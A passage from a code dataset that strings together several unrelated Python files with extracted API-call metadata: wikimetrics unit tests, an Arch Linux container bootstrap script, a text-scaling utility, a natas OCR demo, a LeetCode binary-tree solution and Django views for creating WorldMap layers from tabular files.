'scipy.sparse.csr_matrix', 'csr_matrix', (['matrix'], {}), '(matrix)\n', (2169, 2177), False, 'from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix\n'), ((6009, 6020), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (6018, 6020), False, 'from multiprocessing import cpu_count\n'), ((751, 762), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (760, 762), False, 'from multiprocessing import cpu_count\n'), ((1959, 2004), 'numpy.zeros', 'np.zeros', (['(total_len, total_len)'], {'dtype': 'DTYPE'}), '((total_len, total_len), dtype=DTYPE)\n', (1967, 2004), True, 'import numpy as np\n'), ((2279, 2298), 'numpy.load', 'np.load', (['args.input'], {}), '(args.input)\n', (2286, 2298), True, 'import numpy 
as np\n'), ((2308, 2326), 'scipy.sparse.csr_matrix', 'csr_matrix', (['matrix'], {}), '(matrix)\n', (2318, 2326), False, 'from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix\n'), ((3064, 3080), 'random.Random', 'random.Random', (['(0)'], {}), '(0)\n', (3077, 3080), False, 'import random\n'), ((3297, 3313), 'random.Random', 'random.Random', (['(0)'], {}), '(0)\n', (3310, 3313), False, 'import random\n'), ((3473, 3489), 'random.Random', 'random.Random', (['(0)'], {}), '(0)\n', (3486, 3489), False, 'import random\n')] |
from nose.tools import assert_equals, assert_true
from wikimetrics.metrics import metric_classes
from wikimetrics.models import SumAggregateByUserReport
from wikimetrics.models.storage.wikiuser import WikiUserKey
from wikimetrics.enums import Aggregation
from ..fixtures import DatabaseTest
class SumAggregateByUserReportWithoutQueueTest(DatabaseTest):
    """Tests for the SUM aggregation of SumAggregateByUserReport.finish()."""

    def setUp(self):
        DatabaseTest.setUp(self)
        self.common_cohort_1()

    def _assert_sum(self, results, expected_total):
        """Run finish() over per-user *results* and assert the SUM aggregate.

        The two public tests were byte-level near-duplicates; the shared
        report setup and assertions live here.
        """
        metric = metric_classes['RollingActiveEditor']()
        report = SumAggregateByUserReport(self.cohort, metric)
        report.usernames = {
            WikiUserKey(1, 'enwiki', 12): 'John',
            WikiUserKey(2, 'dewiki', 12): 'John',
            WikiUserKey(3, 'frwiki', 12): 'John',
            WikiUserKey(4, 'ptwiki', 12): 'Kate',
        }
        finished = report.finish([results])
        assert_equals(len(finished), 1)
        assert_true(Aggregation.SUM in finished)
        assert_true('rolling_active_editor' in finished[Aggregation.SUM])
        assert_equals(finished[Aggregation.SUM]['rolling_active_editor'],
                      expected_total)

    def test_finish_positive(self):
        # Two of four users are active -> SUM is 2.
        self._assert_sum({
            '1|enwiki|12': {'rolling_active_editor': 0},
            '2|dewiki|12': {'rolling_active_editor': 1},
            '3|frwiki|12': {'rolling_active_editor': 0},
            '4|ptwiki|12': {'rolling_active_editor': 1},
        }, 2)

    def test_finish_negative(self):
        # No users are active -> SUM is 0.
        self._assert_sum({
            '1|enwiki|12': {'rolling_active_editor': 0},
            '2|dewiki|12': {'rolling_active_editor': 0},
            '3|frwiki|12': {'rolling_active_editor': 0},
            '4|ptwiki|12': {'rolling_active_editor': 0},
        }, 0)
| [
"nose.tools.assert_true",
"wikimetrics.models.storage.wikiuser.WikiUserKey",
"wikimetrics.models.SumAggregateByUserReport",
"nose.tools.assert_equals"
] | [((551, 596), 'wikimetrics.models.SumAggregateByUserReport', 'SumAggregateByUserReport', (['self.cohort', 'metric'], {}), '(self.cohort, metric)\n', (575, 596), False, 'from wikimetrics.models import SumAggregateByUserReport\n'), ((1160, 1200), 'nose.tools.assert_true', 'assert_true', (['(Aggregation.SUM in finished)'], {}), '(Aggregation.SUM in finished)\n', (1171, 1200), False, 'from nose.tools import assert_equals, assert_true\n'), ((1209, 1274), 'nose.tools.assert_true', 'assert_true', (["('rolling_active_editor' in finished[Aggregation.SUM])"], {}), "('rolling_active_editor' in finished[Aggregation.SUM])\n", (1220, 1274), False, 'from nose.tools import assert_equals, assert_true\n'), ((1283, 1351), 'nose.tools.assert_equals', 'assert_equals', (["finished[Aggregation.SUM]['rolling_active_editor']", '(2)'], {}), "(finished[Aggregation.SUM]['rolling_active_editor'], 2)\n", (1296, 1351), False, 'from nose.tools import assert_equals, assert_true\n'), ((1463, 1508), 'wikimetrics.models.SumAggregateByUserReport', 'SumAggregateByUserReport', (['self.cohort', 'metric'], {}), '(self.cohort, metric)\n', (1487, 1508), False, 'from wikimetrics.models import SumAggregateByUserReport\n'), ((2072, 2112), 'nose.tools.assert_true', 'assert_true', (['(Aggregation.SUM in finished)'], {}), '(Aggregation.SUM in finished)\n', (2083, 2112), False, 'from nose.tools import assert_equals, assert_true\n'), ((2121, 2186), 'nose.tools.assert_true', 'assert_true', (["('rolling_active_editor' in finished[Aggregation.SUM])"], {}), "('rolling_active_editor' in finished[Aggregation.SUM])\n", (2132, 2186), False, 'from nose.tools import assert_equals, assert_true\n'), ((2195, 2263), 'nose.tools.assert_equals', 'assert_equals', (["finished[Aggregation.SUM]['rolling_active_editor']", '(0)'], {}), "(finished[Aggregation.SUM]['rolling_active_editor'], 0)\n", (2208, 2263), False, 'from nose.tools import assert_equals, assert_true\n'), ((638, 666), 
'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(1)', '"""enwiki"""', '(12)'], {}), "(1, 'enwiki', 12)\n", (649, 666), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((688, 716), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(2)', '"""dewiki"""', '(12)'], {}), "(2, 'dewiki', 12)\n", (699, 716), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((738, 766), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(3)', '"""frwiki"""', '(12)'], {}), "(3, 'frwiki', 12)\n", (749, 766), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((788, 816), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(4)', '"""ptwiki"""', '(12)'], {}), "(4, 'ptwiki', 12)\n", (799, 816), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1550, 1578), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(1)', '"""enwiki"""', '(12)'], {}), "(1, 'enwiki', 12)\n", (1561, 1578), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1600, 1628), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(2)', '"""dewiki"""', '(12)'], {}), "(2, 'dewiki', 12)\n", (1611, 1628), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1650, 1678), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(3)', '"""frwiki"""', '(12)'], {}), "(3, 'frwiki', 12)\n", (1661, 1678), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1700, 1728), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(4)', '"""ptwiki"""', '(12)'], {}), "(4, 'ptwiki', 12)\n", (1711, 1728), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n')] |
#!/usr/bin/env python3
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from utilities import get_argparser, log, timestamp, run_cmd
from utilities import recursive_chown
import codecs
import jinja2
from glob import glob
import json
import os
import os.path
import re
import setup
import shutil
import subprocess
import tarfile
import urllib.request
import tempfile
import yaml
def main():
    """Install vanilla bootstrap packages from the local mirror.

    Installing all the bootstrap packages is a lengthy (and highly
    disk-IO bound, thus serializing) procedure, so it's best to do it
    only once. Instead of having each container running the make_package
    stage installing the bootstrap packages, we install the bootstrap
    packages in this container and then base the make_package containers
    on the image of this container.

    Afterwards, builds and installs the "red" package with
    toolchain-specific tool-redirection defines, and runs the
    toolchain-specific setup if /toolchain_root is still empty.
    """
    parser = get_argparser()
    args = parser.parse_args()
    # GPG takes time. Remove package signature checks.
    lines = []
    with open("/etc/pacman.conf") as f:
        for line in f:
            if re.search("SigLevel", line):
                lines.append("SigLevel = Never")
            else:
                lines.append(line.strip())
    with open("/etc/pacman.conf", "w") as f:
        for line in lines:
            print(line.strip(), file=f)
    # Package-name lists were produced by an earlier pipeline stage.
    name_data_file = os.path.join(args.shared_directory,
            "get_base_package_names", "latest", "names.json")
    with open(name_data_file) as f:
        name_data = json.load(f)
    bootstrap_packs = (name_data["base"]
                     + name_data["base_devel"]
                     + name_data["tools"]
                     + ["sloccount"])
    cmd = "pacman -S --needed --noconfirm %s" % " ".join(set(bootstrap_packs))
    proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT)
    out, _ = proc.communicate()
    # Decode with errors="replace": pacman output is not guaranteed UTF-8.
    out = codecs.decode(out, errors="replace")
    if proc.returncode:
        log("die", cmd, out.splitlines())
        exit(1)
    else:
        log("command", cmd, out.splitlines())
    # When building red, we need to supply it with a list of defines
    # suitable for this toolchain. Construct those defines here and
    # write out the PKGBUILD with those defines.
    with open("/build/tool_redirect_rules.yaml") as f:
        # FIX: yaml.load() without an explicit Loader raises TypeError on
        # PyYAML >= 6 and is unsafe on older versions; safe_load() is the
        # correct call for plain configuration data.
        transforms = yaml.safe_load(f)
    log("info", "Before rules %s" % yaml.dump(transforms, default_flow_style=False))
    for tool in transforms["overwrite"]:
        transforms["replacements"][tool] = tool
    log("info", "After rules %s" % yaml.dump(transforms, default_flow_style=False))
    defines = []
    for tool, replacement in transforms["replacements"].items():
        # The tool & replacement will be written just like the name of
        # the tool binary, e.g. "scan-view", "clang++", etc. These are
        # not valid identifiers (because they contain - or +), so the
        # libred cmake define variable will write them as SCAN_VIEW and
        # CLANGPP. Do that transformation here, but leave the name of
        # the original tool intact.
        var_name = re.sub("-", "_", tool)
        # FIX: raw string -- "\+" is an invalid escape sequence in a
        # plain string literal (SyntaxWarning on modern Python).
        var_name = re.sub(r"\+\+", "pp", var_name)
        var_name = var_name.upper()
        path = os.path.join(transforms["bin-dir"],
                "%s%s" % (transforms["prefix"], replacement))
        defines.append('-DRED_%s="%s"' % (var_name, path))
        log("info", "Redirecting %s to %s" % (var_name, path))
    if transforms["bin-dir"]:
        defines.append('-DRED_ENSURE_PATH="%s"' % transforms["bin-dir"])
    jinja = jinja2.Environment(loader=jinja2.FileSystemLoader(["/build"]))
    pkgbuild_temp = jinja.get_template("red-PKGBUILD")
    pkgbuild = pkgbuild_temp.render(defines=(" ".join(defines)))
    with open("/build/PKGBUILD", "w") as f:
        f.write(pkgbuild)
    log("info", "Generated PKGBUILD for red", output=pkgbuild.splitlines())
    # Build and install red
    with tempfile.TemporaryDirectory() as d:
        red_tar = os.path.join(d, "red.tar.xz")
        with tarfile.open(red_tar, "w:xz") as tar:
            tar.add("/red", arcname="red")
        shutil.copyfile("/build/PKGBUILD", os.path.join(d, "PKGBUILD"))
        # makepkg refuses to run as root, hence the unprivileged user.
        shutil.chown(d, user="tuscan")
        os.chdir(d)
        cmd = "sudo -u tuscan makepkg --nocolor"
        cp = subprocess.run(cmd.split(), stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT, universal_newlines=True)
        if cp.returncode:
            log("die", cmd, cp.stdout.splitlines())
            exit(1)
        else:
            log("command", cmd, cp.stdout.splitlines())
        package = glob("red*.pkg.tar.xz")
        if not len(package) == 1:
            log("die", "More than one package found", package)
            exit(1)
        cmd = "pacman -U --noconfirm %s" % package[0]
        cp = subprocess.run(cmd.split(), stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT, universal_newlines=True)
        if cp.returncode:
            log("die", cmd, cp.stdout.splitlines())
            exit(1)
        else:
            log("command", cmd, cp.stdout.splitlines())
    if not os.path.isdir("/toolchain_root"):
        log("die", "/toolchain_root is not mounted")
        exit(1)
    if os.listdir("/toolchain_root"):
        log("info", ("Skipping toolchain-specific setup as "
                     "/toolchain_root contains files. Listing:"),
            output=list(os.listdir("/toolchain_root")))
    else:
        log("info", ("/toolchain_root is empty, performing "
                     "toolchain-specific setup"),
            output=list(os.listdir("/toolchain_root")))
        setup.toolchain_specific_setup(args)
        recursive_chown("/toolchain_root")
    exit(0)
# Entry point: run the bootstrap installation when executed as a script.
if __name__ == "__main__":
    main()
| [
"tarfile.open",
"yaml.load",
"setup.toolchain_specific_setup",
"re.search",
"utilities.log",
"codecs.decode",
"os.listdir",
"os.path.isdir",
"utilities.get_argparser",
"glob.glob",
"yaml.dump",
"re.sub",
"tempfile.TemporaryDirectory",
"shutil.chown",
"os.path.join",
"utilities.recursiv... | [((1417, 1432), 'utilities.get_argparser', 'get_argparser', ([], {}), '()\n', (1430, 1432), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((1886, 1975), 'os.path.join', 'os.path.join', (['args.shared_directory', '"""get_base_package_names"""', '"""latest"""', '"""names.json"""'], {}), "(args.shared_directory, 'get_base_package_names', 'latest',\n 'names.json')\n", (1898, 1975), False, 'import os\n'), ((2450, 2486), 'codecs.decode', 'codecs.decode', (['out'], {'errors': '"""replace"""'}), "(out, errors='replace')\n", (2463, 2486), False, 'import codecs\n'), ((5794, 5823), 'os.listdir', 'os.listdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (5804, 5823), False, 'import os\n'), ((6253, 6287), 'utilities.recursive_chown', 'recursive_chown', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (6268, 6287), False, 'from utilities import recursive_chown\n'), ((2041, 2053), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2050, 2053), False, 'import json\n'), ((2889, 2901), 'yaml.load', 'yaml.load', (['f'], {}), '(f)\n', (2898, 2901), False, 'import yaml\n'), ((3656, 3678), 're.sub', 're.sub', (['"""-"""', '"""_"""', 'tool'], {}), "('-', '_', tool)\n", (3662, 3678), False, 'import re\n'), ((3698, 3730), 're.sub', 're.sub', (['"""\\\\+\\\\+"""', '"""pp"""', 'var_name'], {}), "('\\\\+\\\\+', 'pp', var_name)\n", (3704, 3730), False, 'import re\n'), ((3781, 3866), 'os.path.join', 'os.path.join', (["transforms['bin-dir']", "('%s%s' % (transforms['prefix'], replacement))"], {}), "(transforms['bin-dir'], '%s%s' % (transforms['prefix'],\n replacement))\n", (3793, 3866), False, 'import os\n'), ((3959, 4013), 'utilities.log', 'log', (['"""info"""', "('Redirecting %s to %s' % (var_name, path))"], {}), "('info', 'Redirecting %s to %s' % (var_name, path))\n", (3962, 4013), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((4500, 4529), 'tempfile.TemporaryDirectory', 
'tempfile.TemporaryDirectory', ([], {}), '()\n', (4527, 4529), False, 'import tempfile\n'), ((4554, 4583), 'os.path.join', 'os.path.join', (['d', '"""red.tar.xz"""'], {}), "(d, 'red.tar.xz')\n", (4566, 4583), False, 'import os\n'), ((4758, 4788), 'shutil.chown', 'shutil.chown', (['d'], {'user': '"""tuscan"""'}), "(d, user='tuscan')\n", (4770, 4788), False, 'import shutil\n'), ((4797, 4808), 'os.chdir', 'os.chdir', (['d'], {}), '(d)\n', (4805, 4808), False, 'import os\n'), ((5176, 5199), 'glob.glob', 'glob', (['"""red*.pkg.tar.xz"""'], {}), "('red*.pkg.tar.xz')\n", (5180, 5199), False, 'from glob import glob\n'), ((5683, 5715), 'os.path.isdir', 'os.path.isdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (5696, 5715), False, 'import os\n'), ((5725, 5769), 'utilities.log', 'log', (['"""die"""', '"""/toolchain_root is not mounted"""'], {}), "('die', '/toolchain_root is not mounted')\n", (5728, 5769), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((6211, 6247), 'setup.toolchain_specific_setup', 'setup.toolchain_specific_setup', (['args'], {}), '(args)\n', (6241, 6247), False, 'import setup\n'), ((1613, 1640), 're.search', 're.search', (['"""SigLevel"""', 'line'], {}), "('SigLevel', line)\n", (1622, 1640), False, 'import re\n'), ((2939, 2986), 'yaml.dump', 'yaml.dump', (['transforms'], {'default_flow_style': '(False)'}), '(transforms, default_flow_style=False)\n', (2948, 2986), False, 'import yaml\n'), ((3114, 3161), 'yaml.dump', 'yaml.dump', (['transforms'], {'default_flow_style': '(False)'}), '(transforms, default_flow_style=False)\n', (3123, 3161), False, 'import yaml\n'), ((4157, 4192), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (["['/build']"], {}), "(['/build'])\n", (4180, 4192), False, 'import jinja2\n'), ((4597, 4626), 'tarfile.open', 'tarfile.open', (['red_tar', '"""w:xz"""'], {}), "(red_tar, 'w:xz')\n", (4609, 4626), False, 'import tarfile\n'), ((4721, 4748), 'os.path.join', 'os.path.join', (['d', 
'"""PKGBUILD"""'], {}), "(d, 'PKGBUILD')\n", (4733, 4748), False, 'import os\n'), ((5246, 5296), 'utilities.log', 'log', (['"""die"""', '"""More than one package found"""', 'package'], {}), "('die', 'More than one package found', package)\n", (5249, 5296), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((5985, 6014), 'os.listdir', 'os.listdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (5995, 6014), False, 'import os\n'), ((6171, 6200), 'os.listdir', 'os.listdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (6181, 6200), False, 'import os\n')] |
import argparse


def main(argv=None):
    """Scale the integer that follows each '>' marker in a text file.

    For every input line, find the first '>' that is not within the last
    four characters, read the run of digits immediately following it (up
    to seven digits), multiply that number by ``--number``, and write the
    line back with the scaled value substituted.  Lines with no such
    marker (and blank lines) are copied through unchanged.

    :param argv: optional argument list (defaults to sys.argv[1:]);
                 exposed so the function can be driven from tests.
    """
    parser = argparse.ArgumentParser(description='Oh Deyu.')
    parser.add_argument('-i', '--input', help='Input file name', required=True)
    parser.add_argument('-o', '--output', help='Output file name', required=True)
    parser.add_argument('-n', '--number', help='numer', required=True)
    args = parser.parse_args(argv)

    # Hoisted out of the loop: the factor never changes per line.
    factor = float(args.number)
    with open(args.output, 'w') as target, open(args.input) as fp:
        for line in fp:
            # BUGFIX: the original tested ``line.strip() == 0``, comparing a
            # string against an int -- always False.  The intent was clearly
            # an emptiness check; output bytes are unchanged because blank
            # lines previously fell through to the ``b == -1`` branch below.
            if not line.strip():
                target.write(line)
                continue
            b = line.find(">", 0, len(line) - 4)
            if b == -1:
                # No '>' marker in range: pass the line through unchanged.
                target.write(line)
                continue
            for i in range(2, 10):
                # line[b+1 : b-len(line)+i] is the (i-1)-character slice
                # right after '>'; stop at the first slice that is not
                # purely numeric (its last char is the first non-digit).
                num_string = line[b + 1:b - len(line) + i]
                if not num_string.isnumeric():
                    break
            if i == 2:
                # The very first character after '>' is not a digit:
                # nothing to scale, copy the line unchanged.
                target.write(line)
            else:
                # Drop the trailing non-digit, scale, and splice back in.
                scaled = str(int(int(num_string[:-1]) * factor))
                target.write(line[:b - len(line) + 1] + scaled + line[b + i - 1:])


if __name__ == '__main__':
    main()
| [
"argparse.ArgumentParser"
] | [((26, 73), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Oh Deyu."""'}), "(description='Oh Deyu.')\n", (49, 73), False, 'import argparse\n')] |
# Ad-hoc demo / scratch script for the `natas` historical-text and OCR
# post-correction library.  The commented-out section below is an earlier
# experiment that extracted parallel word pairs from a word2vec model;
# it is kept for reference.
from natas import ocr_builder
from mikatools import *
#from gensim.models import Word2Vec
#from gensim.models.keyedvectors import Word2VecKeyedVectors
import natas
# Normalize historical spellings; n_best=5 requests five candidates per word.
print(natas.normalize_words(["seacreat", "wiþe"], n_best=5))
# Suggest corrections for OCR-garbled words (presumably long-s confusions
# such as "paft"/"friendlhip" -- output depends on the installed models).
print(natas.ocr_correct_words(["paft", "friendlhip"]))
#print(natas.is_correctly_spelled("cat"))
#print(natas.is_correctly_spelled("ca7"))
#model = Word2Vec.load("/Users/mikahama/Downloads/models/model_fi_1820-1917.w2v")
#model = Word2VecKeyedVectors.load_word2vec_format("/mnt/c/Users/Mika/Downloads/enwiki_20180420_100d.txt")
#print("ok")
#seed_words = set(json_load("natas/wiktionary_lemmas.json"))
#print("ok")
#res = ocr_builder.extract_parallel(seed_words, model, dictionary=seed_words, lemmatize=False, use_freq=False)
#json_dump(res, "test.json")
| [
"natas.ocr_correct_words",
"natas.normalize_words"
] | [((171, 224), 'natas.normalize_words', 'natas.normalize_words', (["['seacreat', 'wiþe']"], {'n_best': '(5)'}), "(['seacreat', 'wiþe'], n_best=5)\n", (192, 224), False, 'import natas\n'), ((232, 279), 'natas.ocr_correct_words', 'natas.ocr_correct_words', (["['paft', 'friendlhip']"], {}), "(['paft', 'friendlhip'])\n", (255, 279), False, 'import natas\n')] |
#!/usr/bin/env python
"""
CREATED AT: 2021/8/17
Des:
https://leetcode.com/problems/count-good-nodes-in-binary-tree/
https://leetcode.com/explore/challenge/card/august-leetcoding-challenge-2021/615/week-3-august-15th-august-21st/3899/
GITHUB: https://github.com/Jiezhi/myleetcode
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
import collections
from tree_node import *
class Solution:
    def goodNodes(self, root: 'TreeNode') -> int:
        """Count the "good" nodes of a binary tree.

        A node is good when its value is >= every value on the path from
        the root down to it; the root is always good.

        Iterative DFS carrying the running path maximum alongside each
        node.  FIX: the original version propagated the maximum by
        overwriting ``node.val`` in place, mutating the caller's tree;
        this version leaves the input untouched.  (The annotation is a
        forward reference so the class also loads without tree_node.)

        Original submission: 63 / 63 test cases passed on LeetCode.

        :param root: root of a non-empty binary tree
        :return: number of good nodes
        """
        good_nodes = 0
        stack = collections.deque()
        stack.append((root, root.val))
        while stack:
            node, path_max = stack.pop()
            if node.val >= path_max:
                good_nodes += 1
                path_max = node.val
            if node.left:
                stack.append((node.left, path_max))
            if node.right:
                stack.append((node.right, path_max))
        return good_nodes
def test():
    """Ad-hoc assertions against the LeetCode examples."""
    null = None
    cases = [
        ([3, 1, 4, 3, null, 1, 5], 4),
        ([3, 3, null, 4, 2], 3),
        ([1], 1),
    ]
    for level_order, expected in cases:
        assert Solution().goodNodes(build_tree_node(level_order)) == expected
# Run the ad-hoc assertions when executed directly.
if __name__ == '__main__':
    test()
| [
"collections.deque"
] | [((799, 818), 'collections.deque', 'collections.deque', ([], {}), '()\n', (816, 818), False, 'import collections\n')] |
"""
Views to create WorldMap layers by:
- Joining a tabular file to an existing layer OR
- Using Lat/Lng columns for mapping
"""
from django.http import HttpResponse
from django.views.decorators.http import require_POST
from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text
from gc_apps.geo_utils.msg_util import msg, msgt
from gc_apps.gis_basic_file.dataverse_info_service import get_dataverse_info_dict
from gc_apps.gis_tabular.models import TabularFileInfo # for testing
from gc_apps.gis_tabular.models import WorldMapTabularLayerInfo
from gc_apps.gis_tabular.forms import LatLngColumnsForm, ChooseSingleColumnForm
from gc_apps.dv_notify.metadata_updater import MetadataUpdater
from gc_apps.geo_utils.geoconnect_step_names import PANEL_TITLE_MAP_DATA_FILE,\
PANEL_TITLE_STYLE_MAP
from gc_apps.worldmap_connect.utils import get_geocode_types_and_join_layers
from gc_apps.worldmap_connect.lat_lng_service import create_map_from_datatable_lat_lng
from gc_apps.worldmap_connect.table_join_map_maker import TableJoinMapMaker
#from gc_apps.gis_tabular.dataverse_test_info import DataverseTestInfo
from gc_apps.gis_tabular.views import build_map_html
import logging
# Module-level logger, named after this module per logging convention.
LOGGER = logging.getLogger(__name__)
@require_POST
def view_map_tabular_file_form(request):
    """
    AJAX call: Join your tabular file to an existing WorldMap layer
    using the column selected in this form.

    Expected POST parameters:
        - ``tabular_file_info_id``: pk of a TabularFileInfo row
        - the ChooseSingleColumnForm fields (``chosen_column``,
          ``chosen_layer``)

    Always responds with HTTP 200 and a JSON message body; success or
    failure is encoded inside the JSON payload (built via
    MessageHelperJSON), so the client-side JS inspects the payload
    rather than the status code.
    """
    #for k, v in request.POST.items():
    #    print k, v
    # -----------------------------------------
    # Retrieve the id of the Tabular info object
    # -----------------------------------------
    tabular_file_info_id = request.POST.get('tabular_file_info_id', -1)
    try:
        tabular_info = TabularFileInfo.objects.get(pk=tabular_file_info_id)
    except TabularFileInfo.DoesNotExist:
        err_msg = 'Sorry! The Tabular File was not found. (tabular_file_info_id)'
        json_msg = MessageHelperJSON.get_json_fail_msg(err_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
        #raise Http404('No TabularFileInfo for id: %s' % tabular_file_info_id)
    # -----------------------------------------
    # Retrieve available Geocode types and join Layers
    # note: geocode_types_from_worldmap not needed here
    # -----------------------------------------
    (geocode_types_from_worldmap, available_layers_list) = get_geocode_types_and_join_layers()
    # -----------------------------------------
    # Create form with initial + POST data
    # -----------------------------------------
    form_single_column = ChooseSingleColumnForm(tabular_info.id,\
                            available_layers_list,\
                            tabular_info.column_names,\
                            request.POST)
    # -----------------------------------------
    # Check the form's validity
    # -----------------------------------------
    if not form_single_column.is_valid():
        # Form errors are flattened to text for the JSON fail message.
        json_msg = MessageHelperJSON.get_json_fail_msg(\
                        format_errors_as_text(form_single_column, for_web=True))
        return HttpResponse(json_msg, content_type="application/json", status=200)
    #print 'cleaned_data', form_single_column.cleaned_data
    # -----------------------------------------
    # Get Dataverse info dict
    # -----------------------------------------
    dataverse_metadata_dict = get_dataverse_info_dict(tabular_info)
    # -----------------------------------------
    # Use the WorldMap API and
    # try to create a layer
    # -----------------------------------------
    tj_map_maker = TableJoinMapMaker(tabular_info,
                            dataverse_metadata_dict,
                            form_single_column.cleaned_data.get('chosen_column'),
                            form_single_column.cleaned_data.get('chosen_layer'),
                            )
    success = tj_map_maker.run_map_create()
    # Debug/trace output via the msg helper.
    msg('success: %s' % success)
    if not success:
        json_msg = MessageHelperJSON.get_json_fail_msg(\
                'Sorry! ' + tj_map_maker.get_error_msg())
        msg('error msg: %s' % json_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
    # -----------------------------------------
    # Succeeded!  Create a WorldMapTabularLayerInfo object
    # -----------------------------------------
    worldmap_tabular_info = WorldMapTabularLayerInfo.build_from_worldmap_json(tabular_info,\
                                tj_map_maker.get_map_info())
    if worldmap_tabular_info is None:
        # build_from_worldmap_json returned None: log and report error s1.
        LOGGER.error("Failed to create WorldMapTabularLayerInfo using %s",\
            tj_map_maker.get_map_info())
        user_msg = 'Sorry! Failed to create map. Please try again. (code: s1)'
        json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
    # -----------------------------------------
    # Notify Dataverse of the new map
    # (runs in a separate process via popen)
    # -----------------------------------------
    MetadataUpdater.run_update_via_popen(worldmap_tabular_info)
    # -----------------------------------------
    # Build the Map HTML chunk to replace the form
    # -----------------------------------------
    map_html, user_message_html = build_map_html(request, worldmap_tabular_info)
    if map_html is None:    # Failed!  Send an error (code s2)
        LOGGER.error("Failed to create map HTML using WorldMapTabularLayerInfo: %s (%d)",\
                worldmap_tabular_info, worldmap_tabular_info.id)
        user_msg = 'Sorry! Failed to create map. Please try again. (code: s2)'
        json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
    # -----------------------------------------
    # Looks good.  In the JSON response, send
    # back the map HTML
    # -----------------------------------------
    data_dict = dict(map_html=map_html,
                    user_message_html=user_message_html,
                    id_main_panel_title=PANEL_TITLE_STYLE_MAP)
    json_msg = MessageHelperJSON.get_json_success_msg("great job", data_dict=data_dict)
    return HttpResponse(json_msg, content_type="application/json", status=200)
#json_msg = MessageHelperJSON.get_json_success_msg('You got here! (view_map_tabular_file_form)')
#return HttpResponse(json_msg, content_type="application/json", status=200)
@require_POST
def view_process_lat_lng_form(request):
    """
    Create a WorldMap layer from your tabular file
    using the latitude and longitude columns selected in this form.

    Expected POST parameters:
        - ``tabular_file_info_id``: pk of a TabularFileInfo row
        - the LatLngColumnsForm column-selection fields

    Always responds with HTTP 200 and a JSON message body; success or
    failure is encoded inside the JSON payload (built via
    MessageHelperJSON), so the client-side JS inspects the payload
    rather than the status code.
    """
    tabular_file_info_id = request.POST.get('tabular_file_info_id', -1)
    try:
        tabular_info = TabularFileInfo.objects.get(pk=tabular_file_info_id)
    except TabularFileInfo.DoesNotExist:
        err_msg = 'Sorry! The Tabular File was not found. (tabular_file_info_id)'
        json_msg = MessageHelperJSON.get_json_fail_msg(err_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
        #raise Http404('No TabularFileInfo for id: %s' % tabular_file_info_id)
    form_lat_lng = LatLngColumnsForm(tabular_info.id,\
                        tabular_info.column_names,\
                        request.POST)
    if not form_lat_lng.is_valid():
        # Form errors are flattened to text for the JSON fail message.
        json_msg = MessageHelperJSON.get_json_fail_msg(\
                        format_errors_as_text(form_lat_lng,\
                            for_web=True)\
                        )
        #json_msg = MessageHelperJSON.get_json_fail_msg(f.err_msg_for_web)
        return HttpResponse(json_msg, content_type="application/json", status=200)
    # Ask WorldMap to map the rows using the two selected columns.
    (success, worldmap_data_or_err_msg) = create_map_from_datatable_lat_lng(\
                    tabular_info,\
                    form_lat_lng.get_latitude_colname(),\
                    form_lat_lng.get_longitude_colname(),\
                    )
    # -----------------------------------------
    # Failed! Send error message
    # (on failure the second element is an error string)
    # -----------------------------------------
    if not success:
